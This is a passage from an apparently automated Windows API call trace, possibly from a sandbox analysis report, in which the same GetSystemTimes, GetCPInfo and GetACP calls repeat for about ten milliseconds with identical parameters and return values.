lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.296] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.296] GetACP () returned 0x4e4 [0111.296] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.297] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.297] GetACP () returned 0x4e4 [0111.297] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.298] GetACP () returned 0x4e4 [0111.298] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.298] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.299] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.299] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.299] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.300] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.300] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.300] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.300] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.300] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.300] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.300] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.300] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.300] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.300] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.300] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.300] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.300] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.300] GetACP () returned 0x4e4 [0111.300] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.301] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.301] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.301] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.301] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.301] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.301] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.301] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.301] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.301] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.302] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.302] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.302] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.302] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.302] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.302] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.302] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.302] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.302] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.302] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.302] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.302] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.302] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.302] GetACP () returned 0x4e4 [0111.302] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.303] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.303] GetACP () returned 0x4e4 [0111.303] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.303] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.303] GetACP () returned 0x4e4 [0111.303] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.303] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.303] GetACP () returned 0x4e4 [0111.303] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.303] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.303] GetACP () returned 0x4e4 [0111.303] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.303] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.303] GetACP () returned 0x4e4 [0111.303] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.303] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.303] GetACP () returned 0x4e4 [0111.303] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.303] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.303] GetACP () returned 0x4e4 [0111.303] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.304] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.304] GetACP () returned 0x4e4 [0111.304] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] 